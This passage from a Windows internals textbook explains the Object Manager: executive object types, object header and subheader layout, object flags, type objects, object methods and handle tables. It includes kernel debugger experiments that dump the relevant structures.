TmRm (Resource Manager), TmTx (Transaction), TmTm (Transaction Manager), TmEn (Enlistment) — Objects used by the Kernel Transaction Manager (KTM) for various transactions and/or enlistments as part of a resource manager or transaction manager. Objects can be created through the CreateTransactionManager, CreateResourceManager, CreateTransaction, and CreateEnlistment APIs.
RegistryTransaction — Object used by the low-level lightweight registry transaction API that does not leverage the full KTM capabilities but still allows simple transactional access to registry keys.
WindowStation — An object that contains a clipboard, a set of global atoms, and a group of Desktop objects.
Desktop — An object contained within a window station. A desktop has a logical display surface and contains windows, menus, and hooks.
PowerRequest — An object associated with a thread that executes, among other things, a call to SetThreadExecutionState to request a given power change, such as blocking sleeps (due to a movie being played, for example).
EtwConsumer — Represents a connected ETW real-time consumer that has registered with the StartTrace API (and can call ProcessTrace to receive the events on the object queue).
CoverageSampler — Created by ETW when enabling code coverage tracing on a given ETW session.
EtwRegistration — Represents the registration object associated with a user-mode (or kernel-mode) ETW provider that registered with the EventRegister API.
ActivationObject — Represents the object that tracks foreground state for window handles that are managed by the Raw Input Manager in Win32k.sys.
ActivityReference — Tracks processes managed by the Process Lifetime Manager (PLM) and that should be kept awake during Connected Standby scenarios.
ALPC Port — Used mainly by the Remote Procedure Call (RPC) library to provide Local RPC (LRPC) capabilities when using the ncalrpc transport. Also available to internal services as a generic IPC mechanism between processes and/or the kernel.
Composition, DxgkCompositionObject, DxgkCurrentDxgProcessObject, DxgkDisplayManagerObject, DxgkSharedBundleObject, DxgkSharedProtectedSessionObject, DxgkSharedResource, DxgkSwapChainObject, DxgkSharedSyncObject — Used by DirectX 12 APIs in user-space as part of advanced shader and GPGPU capabilities, these executive objects wrap the underlying DirectX handle(s).
CoreMessaging — Represents a CoreMessaging IPC object that wraps an ALPC port with its own customized namespace and capabilities; used primarily by the modern Input Manager but also exposed to any MinUser component on WCOS systems.
EnergyTracker — Exposed to the User Mode Power (UMPO) service to allow tracking and aggregation of energy usage across a variety of hardware and associating it on a per-application basis.
FilterConnectionPort, FilterCommunicationPort — Objects backing the interface exposed by the Filter Manager API, which allows communication between user-mode services and applications and the mini-filters that are managed by the Filter Manager, such as when using FilterSendMessage.
Partition — Enables the memory manager, cache manager, and executive to treat a region of physical memory as unique from a management perspective vis-à-vis the rest of system RAM, giving it its own instance of management threads, capabilities, paging, caching, etc. Used by Game Mode and Hyper-V, among others, to better distinguish the system from the underlying workloads.
Profile — Used by the profiling API that allows capturing time-based buckets of execution that track anything from the Instruction Pointer (IP) all the way to low-level processor caching information stored in the PMU counters.
RawInputManager — Represents the object that is bound to an HID device such as a mouse, keyboard, or tablet and allows reading and managing the window manager input that is being received by it. Used by modern UI management code such as when Core Messaging is involved.
Session — Object that represents the memory manager's view of an interactive user session, and tracks the I/O manager's notifications around connect/disconnect/logoff/logon for third-party driver usage.
Terminal — Only enabled if the terminal thermal manager (TTM) is enabled, this represents a user terminal on a device, which is managed by the user mode power manager (UMPO).
TerminalEventQueue — Only enabled on TTM systems, like the preceding object type, this represents events being delivered to a terminal on a device, which UMPO communicates to the kernel's power manager.
UserApcReserve — Similar to IoCompletionReserve in that it allows precreating a data structure to be reused during low-memory conditions, this object encapsulates an APC object (KAPC) as a user-mode object.
WaitCompletionPacket — Used by the new asynchronous wait capabilities that were introduced in the user-mode Thread Pool API, this object wraps the completion of a dispatcher wait as an I/O packet that can be delivered to an I/O completion port.
WmiGuid — Used by the Windows Management Instrumentation (WMI) APIs when opening WMI Data Blocks by GUID, either from user mode or kernel mode, such as with IoWMIOpenBlock.
Note Because Windows NT was originally supposed to support the OS/2 operating system,
the mutex had to be compatible with the existing design of OS/2 mutual-exclusion objects,
a design that required that a thread be able to abandon the object, leaving it inaccessible.
Because this behavior was considered unusual for such an object, another kernel object—the
mutant—was created. Eventually, OS/2 support was dropped, and the object became used by
the Windows 32 subsystem under the name mutex (but it is still called mutant internally).
CHAPTER 8 System mechanisms
131
Object structure
As Figure 8-31 illustrates, each object has an object header, an object body, and potentially an object footer. The Object Manager controls the object headers and footer, whereas the owning executive components control the object bodies of the object types they create. Each object header also contains an index to a special object, called the type object, that contains information common to each instance of the object. Additionally, up to eight optional subheaders exist: the name information header, the quota information header, the process information header, the handle information header, the audit information header, the padding information header, the extended information header, and the creator information header. If the extended information header is present, this means that the object has a footer, and the header will contain a pointer to it.
[Figure: layout of an object. The object header (containing the object name, object directory, security descriptor, quota charges, open handle count, open handles list, object type, and reference count) precedes the object body, which holds the object-specific data, optionally followed by an object footer. The header's type index points into the Object Type Table at a type object recording the type name, pool type, default quota charges, access types, generic access rights mapping, whether the type is synchronizable, and its methods (open, close, delete, parse, security, query name). Handle table entries from several processes point at the object.]
FIGURE 8-31 Structure of an object.
Object headers and bodies
The Object Manager uses the data stored in an object's header to manage objects without regard to their type. Table 8-16 briefly describes the object header fields, and Table 8-17 describes the fields found in the optional object subheaders.
In addition to the object header, which contains information that applies to any kind of object, the subheaders contain optional information regarding specific aspects of the object. These structures are located at a variable offset from the start of the object header, the value of which depends on the number of subheaders associated with the main object header (except, as mentioned earlier, for creator information).
When the Object Manager checks for a given subheader, it checks whether the corresponding bit is set in the InfoMask and then uses the remaining bits to select the correct offset into the global ObpInfoMaskToOffset table, where it finds the offset of the subheader from the start of the object header.
TABLE 8-16 Object header fields
Field
Purpose
Handle count
Maintains a count of the number of currently opened handles to the object.
Pointer count
Maintains a count of the number of references to the object (including one reference for each handle), and the number of usage references for each handle (up to 32 for 32-bit systems, and 32,768 for 64-bit systems). Kernel-mode components can reference an object by pointer without using a handle.
Security descriptor
Determines who can use the object and what they can do with it. Note that unnamed objects, by definition, cannot have security.
Object type index
Contains the index to a type object that contains attributes common to objects of this type. The table that stores all the type objects is ObTypeIndexTable. Due to a security mitigation, this index is XOR'ed with a dynamically generated sentinel value stored in ObHeaderCookie and the bottom 8 bits of the address of the object header itself.
Info mask
Bitmask describing which of the optional subheader structures described in Table 8-17 are present, except for the creator information subheader, which, if present, always precedes the object. The bitmask is converted to a negative offset by using the ObpInfoMaskToOffset table, with each subheader being associated with a 1-byte index that places it relative to the other subheaders present.
Lock
Per-object lock used when modifying fields belonging to this object header or any of its subheaders.
Object Create Info
Ephemeral information about the creation of the object that is stored until the object is fully inserted into the namespace; afterward, this field converts into a pointer to the quota block.
These offsets exist for all possible combinations of subheader presence, but because the subheaders, if present, are always allocated in a fixed, constant order, a given header will have only as many possible locations as the maximum number of subheaders that precede it. For example, because the name information subheader is always allocated first, it has only one possible offset. On the other hand, the handle information subheader (which is allocated third) has three possible locations because it might or might not have been allocated after the quota subheader, itself having possibly been allocated after the name information. Table 8-17 describes all the optional object subheaders and their locations.
TABLE 8-17 Optional object subheaders

Creator information
Links the object into a list for all the objects of the same type and records the process that created the object, along with a back trace.
Bit: 0 (0x1)
Offset: ObpInfoMaskToOffset[0]

Name information
Contains the object name, responsible for making an object visible to other processes for sharing, and a pointer to the object directory, which provides the hierarchical structure in which the object names are stored.
Bit: 1 (0x2)
Offset: ObpInfoMaskToOffset[InfoMask & 0x3]

Handle information
Contains a database of entries (or just a single entry) for a process that has an open handle to the object (along with a per-process handle count).
Bit: 2 (0x4)
Offset: ObpInfoMaskToOffset[InfoMask & 0x7]

Quota information
Lists the resource charges levied against a process when it opens a handle to the object.
Bit: 3 (0x8)
Offset: ObpInfoMaskToOffset[InfoMask & 0xF]

Process information
Contains a pointer to the owning process if this is an exclusive object. More information on exclusive objects follows later in the chapter.
Bit: 4 (0x10)
Offset: ObpInfoMaskToOffset[InfoMask & 0x1F]

Audit information
Contains a pointer to the original security descriptor that was present when the object was created. This is used by File objects when auditing is enabled to guarantee consistency.
Bit: 5 (0x20)
Offset: ObpInfoMaskToOffset[InfoMask & 0x3F]

Extended information
Stores the pointer to the object footer for objects that require one, such as File and Silo Context Objects.
Bit: 6 (0x40)
Offset: ObpInfoMaskToOffset[InfoMask & 0x7F]

Padding information
Stores nothing—empty junk space—but is used to align the object body on a cache boundary, if this was requested.
Bit: 7 (0x80)
Offset: ObpInfoMaskToOffset[InfoMask & 0xFF]
Each of these subheaders is optional and is present only under certain conditions, either during
system boot or at object creation time. Table 8-18 describes each of these conditions.
TABLE 8-18 Conditions required for presence of object subheaders
Name
Condition
Creator information
The object type must have enabled the maintain type list flag. Driver objects have this flag set if the Driver Verifier is enabled. However, enabling the maintain object type list global flag (discussed earlier) enables this for all objects, and Type objects always have the flag set.
Name information
The object must have been created with a name.
Handle information
The object type must have enabled the maintain handle count flag. File objects, ALPC objects, WindowStation objects, and Desktop objects have this flag set in their object type structure.
Quota information
The object must not have been created by the initial (or idle) system process.
Process information
The object must have been created with the exclusive object flag.
Audit Information
The object must be a File object, and auditing must be enabled for file object events.
Extended information
The object must need a footer, either due to handle revocation information or extended user information.
Padding Information
The object type must have enabled the cache aligned flag. Process objects, for example, have this flag set.
As indicated, if the extended information header is present, an object footer is allocated at the tail of
the object body. Unlike object subheaders, the footer is a statically sized structure that is preallocated
for all possible footer types. There are two such footers, described in Table 8-19.
TABLE 8-19 Conditions required for presence of object footer
Name
Condition
Handle Revocation Information
The object must be created with ObCreateObjectEx, passing in AllowHandleRevocation in the OB_EXTENDED_CREATION_INFO structure.
Extended User Information
The object must be created with ObCreateObjectEx, passing in AllowExtendedUserInfo in the OB_EXTENDED_CREATION_INFO structure. Silo Context objects are created this way.
A number of attributes and flags determine the correct behavior of an object during its lifetime. These are supplied to the Object Manager when the object is being created, in a structure called the object attributes. This structure defines the object name, the root object directory where it should be inserted, the security descriptor for the object, and the object attribute flags, which are listed in Table 8-20.
Note When an object is being created through an API in the Windows subsystem (such as CreateEvent or CreateFile), the caller does not specify any object attributes—the subsystem DLL performs the work behind the scenes. For this reason, all named objects created through Win32 go in the BaseNamedObjects directory, either the global or per-session instance, because this is the root object directory specified as part of the object attributes structure. More information on BaseNamedObjects and how it relates to the per-session namespace follows later in this chapter.
TABLE 8-20 Object flags

OBJ_INHERIT
Header flag bit: Saved in the handle table entry
Determines whether the handle to the object will be inherited by child processes and whether a process can use DuplicateHandle to make a copy.

OBJ_PERMANENT
Header flag bit: PermanentObject
Defines object retention behavior related to reference counts, described later.

OBJ_EXCLUSIVE
Header flag bit: ExclusiveObject
Specifies that the object can be used only by the process that created it.

OBJ_CASE_INSENSITIVE
Header flag bit: Not stored, used at run time
Specifies that lookups for this object in the namespace should be case insensitive. It can be overridden by the case insensitive flag in the object type.

OBJ_OPENIF
Header flag bit: Not stored, used at run time
Specifies that a create operation for this object name should result in an open, if the object exists, instead of a failure.

OBJ_OPENLINK
Header flag bit: Not stored, used at run time
Specifies that the Object Manager should open a handle to the symbolic link, not the target.

OBJ_KERNEL_HANDLE
Header flag bit: KernelObject
Specifies that the handle to this object should be a kernel handle (more on this later).
OBJ_FORCE_ACCESS_CHECK
Header flag bit: Not stored, used at run time
Specifies that even if the object is being opened from kernel mode, full access checks should be performed.

OBJ_KERNEL_EXCLUSIVE
Header flag bit: KernelOnlyAccess
Disables any user-mode process from opening a handle to the object; used to protect the \Device\PhysicalMemory and \Win32kSessionGlobals section objects.

OBJ_IGNORE_IMPERSONATED_DEVICEMAP
Header flag bit: Not stored, used at run time
Indicates that when a token is being impersonated, the DOS Device Map of the source user should not be used; instead, the current process's DOS Device Map should be maintained for object lookup. This is a security mitigation for certain types of file-based redirection attacks.

OBJ_DONT_REPARSE
Header flag bit: Not stored, used at run time
Disables any kind of reparsing situation (symbolic links, NTFS reparse points, registry key redirection), and returns STATUS_REPARSE_POINT_ENCOUNTERED if any such situation occurs. This is a security mitigation for certain types of path redirection attacks.

N/A
Header flag bit: DefaultSecurityQuota
Specifies that the object's security descriptor is using the default 2-KB quota.

N/A
Header flag bit: SingleHandleEntry
Specifies that the handle information subheader contains only a single entry and not a database.

N/A
Header flag bit: NewObject
Specifies that the object has been created but not yet inserted into the object namespace.

N/A
Header flag bit: DeletedInline
Specifies that the object is not being deleted through the deferred deletion worker thread but rather inline through a call to ObDereferenceObject(Ex).
In addition to an object header, each object has an object body whose format and contents are unique to its object type; all objects of the same type share the same object body format. By creating an object type and supplying services for it, an executive component can control the manipulation of data in all object bodies of that type. Because the object header has a static and well-known size, the Object Manager can easily look up the object header for an object simply by subtracting the size of the header from the pointer of the object. As explained earlier, to access the subheaders, the Object Manager subtracts further well-known offsets from the object header pointer.
Because of the standardized object header, footer, and subheader structures, the Object Manager is able to provide a small set of generic services that can operate on the attributes stored in any object header, no matter the object's type (although some generic services don't make sense for certain objects). These generic services, some of which the Windows subsystem makes available to Windows applications, are listed in Table 8-21.
Although all of these services are not generally implemented by most object types, they typically implement at least the create, open, and basic management services. For example, the I/O system implements a create file service for its file objects, and the process manager implements a create-process service for its process objects.
However, some objects may not directly expose such services and could be internally created as the result of a user operation. For example, when opening a WMI Data Block from user mode, a WmiGuid object is created, but no handle is exposed to the application for any kind of close or query services. The key thing to understand, however, is that there is no single generic creation routine. Such a routine would have been quite complicated because the set of parameters required to initialize, say, a file object differs markedly from what is required to initialize an event object. Also, the Object Manager would have incurred additional processing overhead each time a thread called an object service to determine the type of object the handle referred to and to call the appropriate version of the service.
TABLE 8-21 Generic object services
Service
Purpose
Close
Closes a handle to an object, if allowed (more on this later).
Duplicate
Shares an object by duplicating a handle and giving it to another process (if allowed, as described later).
Inheritance
If a handle is marked as inheritable, and a child process is spawned with handle inheritance enabled, this behaves like duplication for those handles.
Make permanent/temporary
Changes the retention of an object (described later).
Query object
Gets information about an object's standard attributes and other details managed at the Object Manager level.
Query security
Gets an object's security descriptor.
Set security
Changes the protection on an object.
Wait for a single object
Associates a wait block with one object, which can then synchronize a thread's execution or be associated with an I/O completion port through a wait completion packet.
Signal an object and wait for another
Signals the object, performing wake semantics on the dispatcher object backing it, and then waits on a single object as per above. The wake/wait operation is done atomically from the scheduler's perspective.
Wait for multiple objects
Associates a wait block with one or more objects, up to a limit (64), which can then synchronize a thread's execution or be associated with an I/O completion port through a wait completion packet.
Type objects
Object headers contain data that is common to all objects but that can take on different values for each instance of an object. For example, each object has a unique name and can have a unique security descriptor. However, objects also contain some data that remains constant for all objects of a particular type. For example, you can select from a set of access rights specific to a type of object when you open a handle to objects of that type. The executive supplies terminate and suspend access (among others) for thread objects, and read, write, append, and delete access (among others) for file objects. To conserve memory, the Object Manager stores these static, type-specific attributes once when creating a new object type. It uses an object of its own, a type object, to record this data. As Figure 8-32 illustrates, if the maintain type list flag (discussed in the previous section) is set, a type object also links together all objects of the same type (in this case, the process type), allowing the Object Manager to find and enumerate them, if necessary. This functionality takes advantage of the creator information subheader discussed previously.
[Figure: four process objects linked in a list together with the process type object.]
FIGURE 8-32 Process objects and the process type object.
EXPERIMENT: Viewing object headers and type objects
You can examine the object header and type object of a process object with the kernel debugger. First, find a process object with the dx @$cursession.Processes debugger data model command:
lkd> dx -r0 &@$cursession.Processes[4].KernelObject
&@$cursession.Processes[4].KernelObject
: 0xffff898f0327d300 [Type: _EPROCESS *]
Then execute the !object command with the process object address as the argument:
lkd> !object 0xffff898f0327d300
Object: ffff898f0327d300 Type: (ffff898f032954e0) Process
ObjectHeader: ffff898f0327d2d0 (new version)
HandleCount: 6 PointerCount: 215645
Notice that on 32-bit Windows, the object header starts 0x18 (24 decimal) bytes prior to the
start of the object body, and on 64-bit Windows, it starts 0x30 (48 decimal) bytes prior—the size
of the object header itself. You can view the object header with this command:
lkd> dx (nt!_OBJECT_HEADER*)0xffff898f0327d2d0
(nt!_OBJECT_HEADER*)0xffff898f0327d2d0
: 0xffff898f0327d2d0 [Type: _OBJECT_HEADER *]
[+0x000] PointerCount : 214943 [Type: __int64]
[+0x008] HandleCount
: 6 [Type: __int64]
[+0x008] NextToFree
: 0x6 [Type: void *]
[+0x010] Lock
[Type: _EX_PUSH_LOCK]
[+0x018] TypeIndex
: 0x93 [Type: unsigned char]
[+0x019] TraceFlags
: 0x0 [Type: unsigned char]
[+0x019 ( 0: 0)] DbgRefTrace
: 0x0 [Type: unsigned char]
[+0x019 ( 1: 1)] DbgTracePermanent : 0x0 [Type: unsigned char]
[+0x01a] InfoMask
: 0x80 [Type: unsigned char]
[+0x01b] Flags
: 0x2 [Type: unsigned char]
[+0x01b ( 0: 0)] NewObject : 0x0 [Type: unsigned char]
[+0x01b ( 1: 1)] KernelObject : 0x1 [Type: unsigned char]
[+0x01b ( 2: 2)] KernelOnlyAccess : 0x0 [Type: unsigned char]
[+0x01b ( 3: 3)] ExclusiveObject : 0x0 [Type: unsigned char]
[+0x01b ( 4: 4)] PermanentObject : 0x0 [Type: unsigned char]
[+0x01b ( 5: 5)] DefaultSecurityQuota : 0x0 [Type: unsigned char]
[+0x01b ( 6: 6)] SingleHandleEntry : 0x0 [Type: unsigned char]
[+0x01b ( 7: 7)] DeletedInline : 0x0 [Type: unsigned char]
[+0x01c] Reserved
: 0xffff898f [Type: unsigned long]
[+0x020] ObjectCreateInfo : 0xfffff8047ee6d500 [Type: _OBJECT_CREATE_INFORMATION *]
[+0x020] QuotaBlockCharged : 0xfffff8047ee6d500 [Type: void *]
[+0x028] SecurityDescriptor : 0xffffc704ade03b6a [Type: void *]
[+0x030] Body
[Type: _QUAD]
ObjectType
: Process
UnderlyingObject [Type: _EPROCESS]
Now look at the object type data structure by copying the pointer that !object showed
you earlier:
lkd> dx (nt!_OBJECT_TYPE*)0xffff898f032954e0
(nt!_OBJECT_TYPE*)0xffff898f032954e0
: 0xffff898f032954e0 [Type: _OBJECT_TYPE *]
[+0x000] TypeList
[Type: _LIST_ENTRY]
[+0x010] Name
: "Process" [Type: _UNICODE_STRING]
[+0x020] DefaultObject : 0x0 [Type: void *]
[+0x028] Index
: 0x7 [Type: unsigned char]
[+0x02c] TotalNumberOfObjects : 0x2e9 [Type: unsigned long]
[+0x030] TotalNumberOfHandles : 0x15a1 [Type: unsigned long]
[+0x034] HighWaterNumberOfObjects : 0x2f9 [Type: unsigned long]
[+0x038] HighWaterNumberOfHandles : 0x170d [Type: unsigned long]
[+0x040] TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x0b8] TypeLock
[Type: _EX_PUSH_LOCK]
[+0x0c0] Key
: 0x636f7250 [Type: unsigned long]
[+0x0c8] CallbackList [Type: _LIST_ENTRY]
The output shows that the object type structure includes the name of the object type, tracks the total number of active objects of that type, and tracks the peak number of handles and objects of that type. The CallbackList field points to the list of Object Manager filtering callbacks that are associated with this object type. The TypeInfo field stores the data structure containing the attributes, flags, and settings common to all objects of the type:
lkd> dx ((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
((nt!_OBJECT_TYPE*)0xffff898f032954e0)->TypeInfo
[Type: _OBJECT_TYPE_INITIALIZER]
[+0x000] Length : 0x78 [Type: unsigned short]
[+0x002] ObjectTypeFlags : 0xca [Type: unsigned short]
[+0x002 ( 0: 0)] CaseInsensitive : 0x0 [Type: unsigned char]
[+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
[+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned char]
[+0x002 ( 3: 3)] SecurityRequired : 0x1 [Type: unsigned char]
[+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
[+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
[+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x1 [Type: unsigned char]
[+0x002 ( 7: 7)] CacheAligned : 0x1 [Type: unsigned char]
[+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
[+0x003 ( 7: 1)] Reserved
: 0x0 [Type: unsigned char]
[+0x004] ObjectTypeCode : 0x20 [Type: unsigned long]
[+0x008] InvalidAttributes : 0xb0 [Type: unsigned long]
[+0x00c] GenericMapping [Type: _GENERIC_MAPPING]
[+0x01c] ValidAccessMask : 0x1fffff [Type: unsigned long]
[+0x020] RetainAccess : 0x101000 [Type: unsigned long]
[+0x024] PoolType
: NonPagedPoolNx (512) [Type: _POOL_TYPE]
[+0x028] DefaultPagedPoolCharge : 0x1000 [Type: unsigned long]
[+0x02c] DefaultNonPagedPoolCharge : 0x8d8 [Type: unsigned long]
[+0x030] DumpProcedure : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
[+0x038] OpenProcedure : 0xfffff8047f062f40 [Type: long (__cdecl*)
(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
[+0x040] CloseProcedure : 0xfffff8047F087a90 [Type: void (__cdecl*)
(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
[+0x048] DeleteProcedure : 0xfffff8047f02f030 [Type: void (__cdecl*)(void *)]
[+0x050] ParseProcedure : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,void * *)]
[+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
[+0x058] SecurityProcedure : 0xfffff8047eff57b0 [Type: long (__cdecl*)
(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,
void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
[+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_
OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
[+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,
void *,void *,char)]
[+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
[+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
[+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]
Type objects can't be manipulated from user mode because the Object Manager supplies no services for them. However, some of the attributes they define are visible to certain native services and through Windows API routines. The information stored in the type initializers is described in Table 8-22.
TABLE 8-22 Type initializer fields
Attribute
Purpose
Type name
The name for objects of this type (Process, Event, ALPC Port, and so on).
Pool type
Indicates whether objects of this type should be allocated from paged or non-
paged memory.
Default quota charges
Default paged and non-paged pool values to charge to process quotas.
Valid access mask
The types of access a thread can request when opening a handle to an object of this
type (read, write, terminate, suspend, and so on).
Generic access rights mapping
A mapping between the four generic access rights (read, write, execute, and all) to the type-specific access rights.
Retain access
Access rights that can never be removed by any third-party Object Manager callbacks
(part of the callback list described earlier).
Flags
Indicate whether objects must never have names (such as process objects), whether their names are case-sensitive, whether they require a security descriptor, whether they should be cache aligned (requiring a padding subheader), whether they support object-filtering callbacks, and whether a handle database (handle information subheader) and/or a type-list linkage (creator information subheader) should be maintained. The use default object flag also defines the behavior for the default object field shown later in this table, and the use extended parameters flag enables use of the extended parse procedure method, described later.
Object type code
Used to describe the type of object this is (versus comparing with a well-known name value). File objects set this to 1, synchronization objects set this to 2, and thread objects set this to 4. This field is also used by ALPC to store handle attribute information associated with a message.
Invalid attributes
Specifies object attribute flags (shown earlier in Table 8-20) that are invalid for this object type.
Default object
Specifies the internal Object Manager event that should be used during waits for this object, if the object type creator requested one. Note that certain objects, such as File objects, already contain an embedded dispatcher object; in this case, this field is instead an offset into the object body.
Wait object flag mask, flag offset, pointer offset
Allows the Object Manager to generically locate the underlying kernel dispatcher object that should be used for synchronization when one of the generic wait services shown earlier (WaitForSingleObject, etc.) is called on the object.
Methods
One or more routines that the Object Manager calls automatically at certain points in an object's lifetime or in response to certain user-mode calls.
Synchronization
Synchronization, one of the attributes visible to Windows applications, refers to a thread's ability to synchronize its execution by waiting for an object to change from one state to another. A thread can synchronize with executive job, process, thread, file, event, semaphore, mutex, and timer objects, among others; other executive objects don't support synchronization. An object's ability to support synchronization is based on three possibilities:
■ The executive object is a wrapper for a dispatcher object and contains a dispatcher header, a kernel structure that is covered in the section "Low-IRQL synchronization" later in this chapter.
■ The creator of the object type requested a default object, and the Object Manager provided one.
■ The executive object has an embedded dispatcher object, such as an event somewhere inside the object body, whose location the creator of the object type supplied to the Object Manager when registering the object type (described in Table 8-14).
Object methods
The last attribute in Table 8-22, methods, comprises a set of internal routines that are similar to C++
constructors and destructors—that is, routines that are automatically called when an object is created
or destroyed. The Object Manager extends this idea by calling an object method in other situations
as well, such as when someone opens or closes a handle to an object or when someone attempts to
-
pending on how the object type is to be used.
When an executive component creates a new object type, it can register one or more methods with the Object Manager. Thereafter, the Object Manager calls the methods at well-defined points in the lifetime of objects of that type, usually when an object is created, deleted, or modified in some way. The methods that the Object Manager supports are listed in Table 8-23.
TABLE 8-23 Object methods
Method
When Method Is Called
Open
When an object handle is created, opened, duplicated, or inherited
Close
When an object handle is closed
Delete
Before the Object Manager deletes an object
Query name
When a thread requests the name of an object
Parse
When the Object Manager is searching for an object name
Dump
Not used
Okay to close
When the Object Manager is instructed to close a handle
Security
When a process reads or changes the protection of an object, such as a file, that exists in a secondary object namespace
One of the reasons for these methods is that certain generic operations cannot be fully generalized: doing so in a single set of routines would have required the designers of the Object Manager to anticipate all object types. Not only would this add extreme complexity to the kernel, but the routines to create an object type are actually exported by the kernel! Because this enables external kernel components to create their own object types, the kernel would be unable to anticipate potential custom behaviors. Although this functionality is not documented for driver developers, it is internally used by Pcw.sys, Dxgkrnl.sys, Win32k.sys, and other drivers to define object types such as ConnectionPort, NdisCmState, and other objects. Through object-method extensibility, these drivers can define their own routines for handling operations such as deletion and querying.
Another reason for these methods is simply to allow a sort of virtual constructor and destructor mechanism, a way of gaining hooks into an object's lifetime, whereby the owning component can perform
additional actions during handle creation and closure, as well as during object destruction. They even
allow prohibiting handle closure and creation, when such actions are undesired—for example, the pro-
tected process mechanism described in Part 1, Chapter 3, leverages a custom handle creation method
to prevent less protected processes from opening handles to more protected ones. These methods
also provide visibility into internal Object Manager APIs such as duplication and inheritance, which are
delivered through generic services.
Certain methods, such as parse and query name, can even be used to implement a secondary namespace outside of the purview of the Object Manager; this is how file system and registry paths are resolved, as described shortly. The following paragraphs describe each of these methods.
The Object Manager only calls routines if their pointer is not set to NULL in the type initializer—with
one exception: the security routine, which defaults to SeDefaultObjectMethod. This routine does not
need to know the internal structure of the object because it deals only with the security descriptor for the object, and the pointer to the security descriptor is stored in the generic object header, not inside the object body. However, if an object does require its own additional security checks, it can define a custom security routine.
The Object Manager calls the open method whenever it creates a handle to an object, which it does when an object is created, opened, duplicated, or inherited. For example, the WindowStation and Desktop objects provide an open method. Indeed, the WindowStation object type requires an open
method so that Win32k.sys can share a piece of memory with the process that serves as a desktop-
related memory pool.
An example of the use of a close method occurs in the I/O system. The I/O manager registers a close method for the file object type, and the Object Manager calls it every time it closes a file object handle. This close method checks whether the process closing the file handle owns any outstanding locks on the file and, if so, removes them. Checking for file locks isn't something the Object Manager itself can or should do.
The Object Manager calls a delete method, if one is registered, before it deletes a temporary object
from memory. The memory manager, for example, registers a delete method for the section object type that frees the physical pages being used by the section. It also verifies that any internal data structures the memory manager has allocated for a section are deleted before the section object is deleted. Once again, the Object Manager can't do this work because it knows nothing about the internal workings of the memory manager. Delete methods for other types of objects perform similar functions.
The parse method (and similarly, the query name method) allows the Object Manager to relinquish control of finding an object to a secondary Object Manager if it finds an object that exists outside the Object Manager namespace. When the Object Manager looks up an object name, it suspends its search when it encounters an object in the path that has an associated parse method. The Object Manager calls the parse method, passing to it the remainder of the object name it is looking for. For example, when a process opens a handle to the object named \Device\HarddiskVolume1\docs\resume.doc, the Object Manager traverses its name tree until it reaches the device object named HarddiskVolume1. It sees that a parse method is associated with this object, and it calls the method, passing to it the rest of the object name it was searching for—in this case, the string docs\resume.doc.
The security method, which the I/O system also uses, is similar to the parse method. It is called whenever a thread tries to query or change the security information protecting a file. This information is different for files than for other objects because security information is stored in the file itself rather than in memory. The I/O system therefore must be called to find the security information and read or change it.
The Object Manager calls the okay-to-close method as an additional layer of protection against malicious, or incorrect, closing of handles being used for system purposes. For example, each process has a handle to the Desktop object or objects on which its thread or threads have windows visible. Under the standard security model, it is possible for those threads to close their handles to their desktops because the process has full control of its own objects. In this scenario, the threads end up without a desktop associated with them—a violation of the windowing model. Win32k.sys registers an okay-to-close routine for the Desktop and WindowStation objects to prevent this behavior.
Object handles and the process handle table
When a process creates or opens an object by name, it receives a handle that represents its access to the object. Referring to an object by its handle is faster than using its name because the Object Manager can skip the name lookup and find the object directly. Processes can also acquire handles to objects by inheriting handles at process creation time (if the creator specifies the inherit handle flag on the CreateProcess call and the handle was marked as inheritable, either at the time it was created or afterward by using the Windows SetHandleInformation function) or by receiving a duplicated handle from another process. (See the Windows DuplicateHandle function.)
All user-mode processes must own a handle to an object before their threads can use the object. An object handle provides two benefits. First, it gives processes a consistent interface to reference objects, regardless of their type. Second, the Object Manager has the exclusive right to create handles and to locate an object that a handle refers to. This means that the Object Manager can scrutinize every user-mode action that affects an object to see whether the security profile of the caller allows the operation requested on the object in question.
Note Executive components and device drivers can access objects directly because they
are running in kernel mode and therefore have access to the object structures in system
memory. However, they must declare their usage of the object by incrementing the refer-
ence count so that the object won't be deallocated while it's still being used. (See the sec-
tion “Object retention” later in this chapter for more details.) To successfully make use of
objects directly, however, drivers need to know the internal structure definition of the
object, and this is not provided for most objects. Instead, device drivers are encouraged to
use the appropriate kernel APIs to modify or read information from the object. For example,
although device drivers can get a pointer to the Process object (EPROCESS), the structure is
opaque, and the Ps* family of APIs must be used instead. For other objects, the type itself is opaque
(such as most executive objects that wrap a dispatcher object—for example, events or mu-
texes). For these objects, drivers must use the same system calls that user-mode applications
end up calling (such as ZwCreateEvent) and use handles instead of object pointers.
EXPERIMENT: Viewing open handles
Run Process Explorer and make sure the lower pane is enabled and configured to show open
